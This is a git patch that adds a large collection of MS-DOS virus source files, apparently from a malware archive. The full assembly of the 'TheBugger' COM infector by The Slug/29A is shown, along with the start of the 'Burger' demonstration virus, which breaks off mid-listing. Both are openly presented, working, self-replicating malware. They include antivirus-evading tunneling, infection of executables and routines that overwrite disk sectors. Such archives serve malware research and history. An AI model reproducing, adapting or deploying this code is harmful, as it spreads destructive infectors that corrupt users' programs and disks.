From 99a7802ac0022730429f483110f6da0c8da4f7c3 Mon Sep 17 00:00:00 2001 From: vxunderground <57078196+vxunderground@users.noreply.github.com> Date: Tue, 12 Jan 2021 17:34:47 -0600 Subject: [PATCH] Add files via upload --- MSDOS/Virus.MSDOS.Unknown.bugger.asm | 537 +++++ MSDOS/Virus.MSDOS.Unknown.burger.asm | 340 +++ MSDOS/Virus.MSDOS.Unknown.bush.asm | 413 ++++ MSDOS/Virus.MSDOS.Unknown.busted.asm | 225 ++ MSDOS/Virus.MSDOS.Unknown.bypass.asm | 220 ++ MSDOS/Virus.MSDOS.Unknown.byteme.asm | 281 +++ MSDOS/Virus.MSDOS.Unknown.c-623.asm | 319 +++ MSDOS/Virus.MSDOS.Unknown.c-627.asm | 330 +++ MSDOS/Virus.MSDOS.Unknown.c-740.asm | 127 ++ MSDOS/Virus.MSDOS.Unknown.c-740b.asm | 127 ++ MSDOS/Virus.MSDOS.Unknown.c-847.asm | 149 ++ MSDOS/Virus.MSDOS.Unknown.c-a-d.asm | 431 ++++ MSDOS/Virus.MSDOS.Unknown.c0t.asm | 26 + MSDOS/Virus.MSDOS.Unknown.cabanas.asm | 2638 +++++++++++++++++++++++ MSDOS/Virus.MSDOS.Unknown.cache.asm | 255 +++ MSDOS/Virus.MSDOS.Unknown.cacodmon.asm | 336 +++ MSDOS/Virus.MSDOS.Unknown.caffein.asm | 213 ++ MSDOS/Virus.MSDOS.Unknown.cancer.asm | 128 ++ MSDOS/Virus.MSDOS.Unknown.cannab1.asm | 231 ++ MSDOS/Virus.MSDOS.Unknown.cannab2.asm | 278 +++ MSDOS/Virus.MSDOS.Unknown.cannab2.txt | 278 +++ MSDOS/Virus.MSDOS.Unknown.cannab3.asm | 280 +++ MSDOS/Virus.MSDOS.Unknown.cannab3i.asm | 280 +++ MSDOS/Virus.MSDOS.Unknown.cannab4.asm | 264 +++ MSDOS/Virus.MSDOS.Unknown.carbunc.asm | 244 +++ MSDOS/Virus.MSDOS.Unknown.caroevil.asm | 323 +++ MSDOS/Virus.MSDOS.Unknown.carpdiem.asm | 292 +++ MSDOS/Virus.MSDOS.Unknown.carpe.asm | 293 +++ MSDOS/Virus.MSDOS.Unknown.cascade.asm | 1188 ++++++++++ MSDOS/Virus.MSDOS.Unknown.cascspec.asm | 1183 ++++++++++ MSDOS/Virus.MSDOS.Unknown.casino.asm | 1428 ++++++++++++ MSDOS/Virus.MSDOS.Unknown.casper.asm | 776 +++++++ MSDOS/Virus.MSDOS.Unknown.catchme.asm | 138 ++ MSDOS/Virus.MSDOS.Unknown.catphish.asm | 552 +++++ MSDOS/Virus.MSDOS.Unknown.catphish1.asm | 675 ++++++ MSDOS/Virus.MSDOS.Unknown.cclust2.asm | 279 +++ MSDOS/Virus.MSDOS.Unknown.cdeath3.asm | 631 ++++++ MSDOS/Virus.MSDOS.Unknown.cdeath4.asm | 602 ++++++ MSDOS/Virus.MSDOS.Unknown.cdeath5.asm | 605 ++++++ MSDOS/Virus.MSDOS.Unknown.cdiem2.asm | 847 ++++++++ MSDOS/Virus.MSDOS.Unknown.cdset.asm | 487 +++++ MSDOS/Virus.MSDOS.Unknown.cdset4.asm | 655 ++++++ MSDOS/Virus.MSDOS.Unknown.cdset5.asm | 661 ++++++ MSDOS/Virus.MSDOS.Unknown.cdset6.asm | 631 ++++++ MSDOS/Virus.MSDOS.Unknown.cemetary.asm | 737 +++++++ MSDOS/Virus.MSDOS.Unknown.cerebus.asm | 703 ++++++ MSDOS/Virus.MSDOS.Unknown.cgagrafa.asm | 182 ++ MSDOS/Virus.MSDOS.Unknown.chad.asm | 205 ++ MSDOS/Virus.MSDOS.Unknown.chaos.nfo | 26 + MSDOS/Virus.MSDOS.Unknown.charly2.asm | 637 ++++++ MSDOS/Virus.MSDOS.Unknown.chc.asm | 87 + MSDOS/Virus.MSDOS.Unknown.chchoke.asm | 58 + MSDOS/Virus.MSDOS.Unknown.cheeba.asm | 857 ++++++++ MSDOS/Virus.MSDOS.Unknown.cheeser.asm | 416 ++++ MSDOS/Virus.MSDOS.Unknown.cheesy.asm | 186 ++ MSDOS/Virus.MSDOS.Unknown.cia.asm | 241 +++ MSDOS/Virus.MSDOS.Unknown.cia2.asm | 247 +++ MSDOS/Virus.MSDOS.Unknown.ciavirus.asm | 239 ++ MSDOS/Virus.MSDOS.Unknown.cih.txt | 1165 ++++++++++ MSDOS/Virus.MSDOS.Unknown.cih15.asm | 1402 ++++++++++++ MSDOS/Virus.MSDOS.Unknown.cih15_2.asm | 1402 ++++++++++++ MSDOS/Virus.MSDOS.Unknown.cih_12.asm | 1480 +++++++++++++ MSDOS/Virus.MSDOS.Unknown.cih_12_2.asm | 1480 +++++++++++++ MSDOS/Virus.MSDOS.Unknown.cih_13.asm | 1490 +++++++++++++ MSDOS/Virus.MSDOS.Unknown.cih_14.asm | 1533 +++++++++++++ MSDOS/Virus.MSDOS.Unknown.cint.asm | 226 ++ MSDOS/Virus.MSDOS.Unknown.civil.asm | 569 +++++ MSDOS/Virus.MSDOS.Unknown.civil210.asm | 363 ++++ MSDOS/Virus.MSDOS.Unknown.civil211.asm | 303 +++ MSDOS/Virus.MSDOS.Unknown.civil310.asm | 476 ++++ MSDOS/Virus.MSDOS.Unknown.civil510.asm | 337 +++ MSDOS/Virus.MSDOS.Unknown.civil_4a.asm | 190 ++ MSDOS/Virus.MSDOS.Unknown.civil_4b.asm | 196 ++ MSDOS/Virus.MSDOS.Unknown.civil_4c.asm | 197 ++ MSDOS/Virus.MSDOS.Unknown.civil_4d.asm | 201 ++ MSDOS/Virus.MSDOS.Unknown.civil_ii.asm | 308 +++ MSDOS/Virus.MSDOS.Unknown.civilser.asm | 569 +++++ MSDOS/Virus.MSDOS.Unknown.civilwar.asm | 303 +++ MSDOS/Virus.MSDOS.Unknown.cj.asm | 588 +++++ MSDOS/Virus.MSDOS.Unknown.clap.asm | 195 ++ MSDOS/Virus.MSDOS.Unknown.clust.asm | 259 +++ MSDOS/Virus.MSDOS.Unknown.cluster1.asm | 176 ++ MSDOS/Virus.MSDOS.Unknown.cluster2.asm | 249 +++ MSDOS/Virus.MSDOS.Unknown.cocroach.asm | 336 +++ MSDOS/Virus.MSDOS.Unknown.codezero.asm | 381 ++++ MSDOS/Virus.MSDOS.Unknown.coffshop.asm | 1662 ++++++++++++++ MSDOS/Virus.MSDOS.Unknown.coffshp1.asm | 825 +++++++ MSDOS/Virus.MSDOS.Unknown.coffshp3.asm | 1674 ++++++++++++++ MSDOS/Virus.MSDOS.Unknown.coke.asm | 280 +++ MSDOS/Virus.MSDOS.Unknown.collectn.txt | 26 + MSDOS/Virus.MSDOS.Unknown.combat.asm | 142 ++ MSDOS/Virus.MSDOS.Unknown.comdex7.asm | 805 +++++++ MSDOS/Virus.MSDOS.Unknown.comment1.asm | 334 +++ MSDOS/Virus.MSDOS.Unknown.comment2.asm | 334 +++ MSDOS/Virus.MSDOS.Unknown.compiler.asm | 312 +++ MSDOS/Virus.MSDOS.Unknown.compo.asm | 616 ++++++ MSDOS/Virus.MSDOS.Unknown.compres.asm | 224 ++ MSDOS/Virus.MSDOS.Unknown.comvirus.asm | 458 ++++ MSDOS/Virus.MSDOS.Unknown.copcom.asm | 103 + 99 files changed, 50186 insertions(+) create mode 100644 MSDOS/Virus.MSDOS.Unknown.bugger.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.burger.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.bush.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.busted.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.bypass.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.byteme.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.c-623.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.c-627.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.c-740.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.c-740b.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.c-847.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.c-a-d.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.c0t.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cabanas.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cache.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cacodmon.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.caffein.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cancer.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cannab1.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cannab2.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cannab2.txt create mode 100644 MSDOS/Virus.MSDOS.Unknown.cannab3.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cannab3i.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cannab4.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.carbunc.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.caroevil.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.carpdiem.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.carpe.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cascade.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cascspec.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.casino.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.casper.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.catchme.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.catphish.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.catphish1.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cclust2.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cdeath3.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cdeath4.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cdeath5.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cdiem2.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cdset.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cdset4.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cdset5.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cdset6.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cemetary.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cerebus.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cgagrafa.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.chad.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.chaos.nfo create mode 100644 MSDOS/Virus.MSDOS.Unknown.charly2.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.chc.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.chchoke.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cheeba.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cheeser.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cheesy.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cia.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cia2.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.ciavirus.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cih.txt create mode 100644 MSDOS/Virus.MSDOS.Unknown.cih15.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cih15_2.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cih_12.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cih_12_2.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cih_13.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cih_14.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cint.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.civil.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.civil210.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.civil211.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.civil310.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.civil510.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.civil_4a.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.civil_4b.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.civil_4c.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.civil_4d.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.civil_ii.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.civilser.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.civilwar.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cj.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.clap.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.clust.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cluster1.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cluster2.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cocroach.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.codezero.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.coffshop.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.coffshp1.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.coffshp3.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.coke.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.collectn.txt create mode 100644 MSDOS/Virus.MSDOS.Unknown.combat.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.comdex7.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.comment1.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.comment2.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.compiler.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.compo.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.compres.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.comvirus.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.copcom.asm diff --git a/MSDOS/Virus.MSDOS.Unknown.bugger.asm b/MSDOS/Virus.MSDOS.Unknown.bugger.asm new file mode 100644 index 00000000..c9e350c6 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.bugger.asm @@ -0,0 +1,537 @@ +;北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北 +;北 北 +;北 痧痧痧 痧 痧 痧痧 痧痧 痧 痧 痧痧 痧痧 痧痧 痧痧 北 +;北 痧 痧痧 痧= == 痧 痧 痧 痧 痧= 痧 北 +;北 痧 痧 痧 痧 痧 痧 痧 痧 痧 痧 痧 痧痧 北 +;北 痧 痧 痧 痧痧 痧痧 痧痧 痧痧 痧痧 痧痧 痧 VIRUS. 北 +;北 北 +;北  A 29A Research Code by The Slug.  北 +;北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北 +;北 TheBugger is a simple COM infector with some interesting 北 +;北 inprovements. 北 +;北 北 +;北 Its first difference with a normal COM virus is the tricky resident 北 +;北 check; it's designed to avoid lamers writing the typical resident 北 +;北 program wich returns the residency code and forces the virus to not 北 +;北 install in memory. To avoid that, the virus makes an extra check of 北 +;北 a random byte in the memory copy; if the check fails, it jumps to a 北 +;北 simulated HD formatting routine }:). 北 +;北 北 +;北 Another interesting feature is the tunneling routine. It uses the 北 +;北 common code trace method but it starts tracing from PSP call to int 北 +;北 21h instead of doing it from normal int 21h vector in order to avoid 北 +;北 resident antivirus stopping trace mode. This call is supported for 北 +;北 compatibility with older DOS versions and it has some little 北 +;北 diferences with the normal int 21 handler: first, the function code 北 +;北 is passed in cl register (not in ah as usual) and second, the 北 +;北 function to call can't be higher than 24h. These diferences are 北 +;北 handled by the O.S. in a separated routine and then it jumps to the 北 +;北 original int 21h handler, so the tunneling routine only skips the 北 +;北 first 'compatibility' routines and gets the real int 21h address :).北 +;北 北 +;北 The last big feature, is the infection method; the virus infects COM 北 +;北 files by changing a call in host code to point to it. This call may 北 +;北 be one between the second and fifth. This is done by intercepting 北 +;北 the int 21h service 4bh (exec), when a COM file is executed, the vi- 北 +;北 rus changes its first word with an int CDh call, it intercepts this 北 +;北 int and jumps to the int 21h. When the host starts running, it exe- 北 +;北 cutes the int CDh and then the virus takes control; it restores host 北 +;北 first word and changes int 01h to trace host in order to find a call 北 +;北 to infect }:) The use of int CDh can be avoided by tracing int 21h 北 +;北 until host code, but this way we have the same problem of resident 北 +;北 antivirus. 北 +;北 北 +;北 And that's all folks :), enjoy it. 北 +;北 北 +;北 9  北 +;北 The Slug/29A };){|0D==8北 +;北 I Love This Job. 3--------北 +;北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北 + +.286 +code segment 'TheBugger' +assume cs:code,ds:code,ss:code +org 0h + +virsize equ (virend-start)+1 + +;北北北北北北北北北北北北北北北 Main C0de 北北北北北北北北北北北北北北北北北 + +start: push cs ;address t0 return t0 h0st. + db 68h ;push '0ffset'. + retonno dw 0000 + + push ds es + pusha + + call sig ;get nasty delta 0ffset. +sig: pop si + sub si, offset(sig) + + mov ax, 0B0B0h ;resident check. + int 21h + cmp ax, 0BABAh + jne instal + jmp lstchk + +instal: mov ah, 62h ;get PSP segment. + int 21h + xchg bx,ax ;get MCB addres. + dec ax + mov ds,ax + + cmp byte ptr ds:[0],'Z' ;is the last MCB? + je chgmcb + jmp aprog + +chgmcb: sub word ptr ds:[3],(virsize/10h)+8 ;change bl0ck size in MCB + sub word ptr ds:[12h],(virsize/10h)+8 ;& in PSP. + add ax,ds:[3] + inc ax + + cld ;copy to new l0cati0n. + mov es, ax + xor di, di + push cs + pop ds + mov cx, virsize + rep movsb + + push es ;jump t0 c0py. + push offset(newcpy) + retf + +newcpy: mov si, 06h ;m0ve call t0 int 21, + lea di, PSPcall+1 ;fr0m PSP t0 c0py 0f virus. + movsw + movsw + + mov ds, cx ;save curent int 21h vect0r. + mov si,21h*4 ;) cx=0 + lea di,int21+1 + movsw + movsw + + mov word ptr ds:[01h*4], offset(tunn) ;hang tunneling code :) + mov word ptr ds:[01h*4]+2, es + + pushf ;call int 21h fr0m PSP in trace m0de. + pop ax + or ah, 01h + push ax + mov cl, 0Bh ;get input status function (in cl ;). + popf + call PSPcall + + mov word ptr [si-4], offset(hdl21) ;hang new int 21h handler. + mov word ptr [si-2], es + +aprog: popa ;return t0 h0st. + pop es ds + retf + +lstchk: in ax, 40h ;check rand0m w0rd of mem0ry c0py. + and ax, 0200h + push si + add si, ax + mov di, ax + cmpsw + pop si + je aprog + +buuuhh: push cs ;display funny message :) + pop ds + lea dx, joke + add dx, si + mov ah,09h + int 21h + + mov dx,0180h ;I think it's clear enought };). + mov cx,07FFh +funny: mov ax,0401h + int 13h + loop funny + +;北北北北北北北北北北北北北北北北 Data 北北北北北北北北北北北北北北北北北北 + +credits db 'TheBugger virus by The Slug/29A' +intCD: int 0CDh ;int t0 detect h0st execution. +PSPcall: db 9Ah + dd 0 ;PSP call t0 int21h ;) +joke db 'Removing virus from memory...',13,10,'$' + +;北北北北北北北北北北北北北北 Int 21h Handler 北北北北北北北北北北北北北北北 + +hdl21: cmp ax, 0B0B0h ;resident service? + jne func2 + mov ax,0BABAh + push cs ;return virus segment in es + pop es ;f0r extra check. + iret + +func2: cmp ax, 4B00h ;exec service? + je exec + +int21: db 0EAh ;jmp t0 int 21h. + dd 0 + +exec: push ds es + pusha + pushf + + mov si, dx ;c0py filespec. + push cs + pop es + lea di, path +next: lodsb + stosb + cmp al, 0 + jne next + + sub si, 4 ;is a .c0m file? + lodsw + xor ax, 2020h + cmp ax, 'oc' + jne nocom + + call chgattr ;change file attributes. + + mov ax, 3D02h ;0pen file. + int 03h + xchg bx, ax + + call getdate ;get file time & date. + + lea dx, firstb ;read first 3 bytes 0f file + mov cx, 3 ;t0 exe check & h0st detect rutine. + mov ah, 3Fh + int 03h + + cmp word ptr cs:firstb, 'ZM' ;is an exe file (MZ sign)? + je exit + + xor cx, cx ;g0 t0 file start again. + mov ax, 4200h + cwd ;dx <- 0 ;) + int 03h + + lea dx, intCD ;write 'int CDh' c0de 0n file start + mov cx, 2 ;t0 detect h0st execution. + mov ah, 40h + int 03h + + + xor ax, ax ;change int CDh vect0r + mov es, ax ;f0r h0st detection. + mov ax, es:[0CDh*4] + mov intcddes, ax + mov ax, es:[0CDh*4]+2 + mov intcdseg, ax + mov es:[0CDh*4], offset(fndhst) + mov es:[0CDh*4]+2, cs + +exit: mov ah, 3Eh ;cl0se file. + int 03h + +nocom: popf + popa + pop es ds + jmp int21 + +;北北北北北北北北北北北北北 First Int 01 Handler 北北北北北北北北北北北北北 + +tunn: push ds es bp ;trace int 21 f0r tunneling. + pusha + + call getret ;get next instructi0n address in es:di. + + cmp es:[di], 0FC80h ;is an 'cmp ax, ??' + jne fuera + cmp byte ptr es:[di+2], 24h ;avoid 'cmp ax, 24h' + je fuera + +stop: xor bx, bx + mov es, bx + mov es:[03h*4], di ;make int 03h point to true int 21h ;) + mov es:[03h*4]+2, ax + + lodsw ;trace m0de 0ff. + and ah, 0FEh + mov [si-2], ax + +fuera: popa + pop bp es ds + iret + +;北北北北北北北北北北北北北北 Int CDh Handler 北北北北北北北北北北北北北北北 + +fndhst: push ds es bp ;detect h0st c0de at exec. + pusha + + call getret ;get next instructi0n dir. + +chkhst: cmp di, 102h ;ensure it's h0st start :) + jne nohost + + push cs + pop ds + + mov ax, word ptr firstb ;rest0re first h0st w0rd in mem0ry. + dec di + dec di + stosw + + lea dx, path ;0pen file. + push dx + mov ax, 3D02h + int 21h + xchg bx, ax + + lea dx, firstb ;rest0re first w0rd 0f file. + mov cx, 2 + mov ah, 40h + int 21h + + call setdate ;rest0re file date & time. + mov ah ,3Eh ;cl0se file. + int 21h + pop dx + call setattr ;rest0re file attributes. + + xor ax, ax ;rest0re int CDh vect0r. + mov es, ax + mov ax, intcddes + mov es:[0CDh*4], ax + mov ax, intcdseg + mov es:[0CDh*4]+2, ax + + + mov word ptr es:[01h*4], offset(fndcal) ;change int 01h vect0r + mov es:[01h*4]+2, cs ;t0 find a call. + + mov numinstr, 0FFh ;max number 0f instr. t0 trace. + + in ax, 40h ;ramd0m ch0se 0f call t0 infect (2-5). + and al, 03h + inc al + inc al + mov numcall, al + + push ss ;rest0re 0riginal IP (100h) 0n stack. + pop ds + dec di + dec di + mov [si-4], di + + lodsw ;trace m0de 0n + or ah, 01h + mov ss:[si-2], ax + +nohost: popa + pop bp es ds + iret + +;北北北北北北北北北北北北北 Second Int 01 Handler 北北北北北北北北北北北北北 + +fndcal: push ds es bp ;trace h0st t0 find a call t0 infect. + pusha + + dec cs:numinstr ;check instructi0n trace limit. + jnz goon + jmp off + +goon: call getret ;get ret address. + + cmp di, cs:lstdsp ;d0 n0t c0unt 0ne m0re instructi0n + jne norep ;0n 'rep' prefixed instructi0ns. + inc cs:numinstr + +norep: mov cs:lstdsp, di ;st0re actual return 0ffset. + + mov ax, es:[di] + + cmp al, 9Dh ;check f0r a p0pf. + jne chkirt + lodsw + lodsw + or ah, 01h ;ensure trap flag will be 0n. + mov [si-2], ax + jmp nocall + +chkirt: cmp al, 0CFh ;check f0r a iret. + jne chkint + lodsw + lodsw + lodsw + lodsw + or ah, 01h ;ensure trap flag will be 0n. + mov [si-2], ax +anocall:jmp nocall + +chkint: cmp al, 0CDh ;check f0r a int xx. + jne chkint3 + cmp ah, 20h ;skip ints 20h, 21h & 20h + je anocall + cmp ah, 21h + je anocall + cmp ah, 27h + je anocall + + mov cs:numint, ax ;int number t0 perf0rm call. + + inc di ;inc ret addr t0 step 0ver int call. + inc di + mov [si-4], di + + popa + pop bp es ds + numint dw 00 ;perf0rm int call in virus c0de. + iret + +chkint3:cmp al, 0CCh ;check int 03h call. + jne chkcal + inc di + mov [si-4], di ;step 0ver int call. + jmp nocall + +chkcal: cmp al, 0E8h ;check f0r a call t0 infect. + je found + jmp nocall + +found: dec cs:numcall ;it's the nice 0ne ;) + je go + cmp cs:numinstr, 20 ;d0n't be s0 extrict in call number + jb go ;if there are t00 few calls. + jmp nocall + +go: call chgattr ;change attributes. + + mov ax, 3D02h ;0pen file. + int 03h + xchg bx, ax + + call getdate ;get file date & time. + + xor cx, cx ;m0ve t0 file call positi0n. + mov dx, di + sub dx, 100h + mov ax, 4200h + int 03h + + lea dx, check ;read call fr0m file f0r c0mpress chk. + mov cx, 1 + mov ah, 3Fh + int 03h + + cmp check, 0E8h ;c0mpressed file? + je ok + jmp close + +ok: xor cx, cx ;m0ves t0 end 0f file. + mov ax, 4202h + cwd ;dx <- 0 ;) + int 03h + mov hostsize, ax + + sub ax, di ;find call parameter. + add ax, 0FDh + mov hostsize, ax ;f0r a new "call hostsize". + + mov ax, es:[di+1] ;0ffset t0 return t0 h0st + add ax, di + add ax, 3 + mov retonno, ax + + lea dx, start ;save mi c0de at file end. + mov cx, virsize + mov ah, 40h + int 03h + + xor cx, cx ;m0ves again t0 call. + sub di, 0FFh + mov dx, di + mov ax, 4200h + int 03h + + lea dx, hostsize ;change it. }:) + mov cx, 2 + mov ah, 40h + int 03h + +close: call setdate ;rest0re file time & date. + + mov ah, 3Eh ;cl0se file. + int 03h + + lea dx, path + call setattr ;rest0re file attributes. + +off: mov bp, sp + mov ax, ss:[bp+26] ;trace m0de 0ff. + and ah, 0FEh + mov ss:[bp+26], ax + +nocall: popa + pop bp es ds + iret + +;北北北北北北北北北北北 Get Ret Address Fr0m Stack 北北北北北北北北北北北北 + +getret: mov si, sp ;get next instructi0n dir. + add si, 24 + push ss + pop ds + lodsw + mov di, ax + lodsw + mov es, ax + ret + +;北北北北北北北北北北北北 S0me File Handling C0de 北北北北北北北北北北北北北 + +chgattr:push cs + pop ds + lea dx, path + mov ax,4300h ;change file attributes. + int 03h + mov attrib,cx + xor cx, cx ;reset file atributes. + mov ax,4301h + int 03h + ret + +setattr:mov cx, attrib ;rest0re file attributes. + mov ax,4301h + int 03h + ret + +getdate:mov ax,5700h ;get file time & date. + int 03h + mov time,cx + mov date,dx + ret + +setdate:mov cx,time ;rest0re file time & date. + mov dx,date + mov ax,5701h + int 03h + ret +virend: + +;北北北北北北北北北北北北北北 Virtual Data 北北北北北北北北北北北北北北北北 + +firstb db 3 dup(0) ;buffer f0r h0st start. +lstdsp dw 0 ;last trace 0ffset. +numinstr db 0 ;max. number 0f instructi0ns t0 trace. +numcall db 0 ;call t0 infect (2-5). +intcddes dw 0 ;int CD vect0r backup. +intcdseg dw 0 +hostsize dw 0 ;it's just the h0st size ;) +attrib dw 0 ;file attributes. +time dw 0 ;file time. +date dw 0 ;file date. +check db 0 ;check f0r compressed file. +path db 0 ;path to host. + +code ends +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.burger.asm b/MSDOS/Virus.MSDOS.Unknown.burger.asm new file mode 100644 index 00000000..2081ef42 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.burger.asm @@ -0,0 +1,340 @@ +; Program Virus Ver.: 1.1 +; Copyright by R. Burger 1986 +; This is a demonstration program for computer +; viruses. It has the ability to replicate itself, +; and thereby modify other programs +; +; Added A86 v3.22 compatibility 15 Dec 1991 +; command line: a86 burger.asm burger.com +D +; Copyright (C) 1991 ==[ CyberZone ]== Jon A Johnson + +page 70,120 +Name BURGER +code segment + assume cs:code +progr equ 100h + org progr + +; The three NOP's serve as the marker byte of the +; virus which allow it to identify a virus. + +MAIN: + nop + nop + nop + +; Initialize the pointers + + mov ax,00 + mov es:[pointer],ax + mov es:[counter],ax + mov es:[disks],al + +; Get the selected drive + + mov ah,19h ; drive? + int 21h + +; Get the current path on the current drive + + mov cs:drive,al ; save drive + mov ah,47h ; dir? + mov dh,0 + add al,1 + mov dl,al ; in actual drive + lea si,cs:old_path + int 21h + +; Get the number of drives present +; If only one drive is present, the pointer for +; search order will be set to search order + 6 + + mov ah,0eh ; how many disks + mov dl,0 + int 21h + mov al,01 + cmp al,01 ; one drive? + jnz hups3 + mov al,06 + +hups3: + mov ah,0 + lea bx,search_order + add bx,ax + add bx,0001h + mov cs:pointer,bx + clc + +; Carry is set, if no more .COM's are found. +; Then, to avoid unnecessary work, .EXE files will +; be renamed to .COM files and infected. +; This causes the error message "Program too large +; to fit in memory" when starting larger infected +; .EXE programs. + +change_disk: + jnc no_name_change + mov ah,17h ; change exe to com + lea dx,cs:maske_exe + int 21h + cmp al,0ffh + jnz no_name_change ; .EXE found? + +; If neither .COM nor .EXE is found, then sectors will +; be overwritten depending on the system time in +; milliseconds. This is the time of the complete +; "infection" of a storage medium. The virus can find +; nothing more to infect and starts its destruction. + + mov ah,2ch ; read system clock + int 21h + mov bx,cs:pointer + mov al,cs:[bx] + mov bx,dx + mov cx,2 + mov dh,0 + int 26h ; write crap on disk + +; Check if the end of the search order table has been +; reached. If so, end. + +no_name_change: + mov bx,cs:pointer + dec bx + mov cs:pointer,bx + mov dl,cs:[bx] + cmp dl,0ffh + jnz hups2 + jmp hops + +; Get new drive from the search order table and +; select it. + +hups2: + mov ah,0eh + int 21h ; change disk + +; Start in the root directory + + mov ah,3bh ; change path + lea dx,path + int 21h + jmp find_first_file + +; Starting from the root, search for the first subdir +; First convert all .EXE files to .COM in the old +; directory. + +find_first_subdir: + mov ah,17h ; change exe to com + lea dx,cs:maske_exe + int 21h + mov ah,3bh ; use root dir + lea dx,path + int 21h + mov ah,04eh ; Search for first subdirectory + mov cx,00010001b ; dir mask + lea dx,maske_dir + int 21h + jc change_disk + mov bx,CS:counter + INC BX + DEC bx + jz use_next_subdir + +; Search for the next subdir. If no more directories +; are found, the drive will be changed. + +find_next_subdir: + mov ah,4fh ; search for next subdir + int 21h + jc change_disk + dec bx + jnz 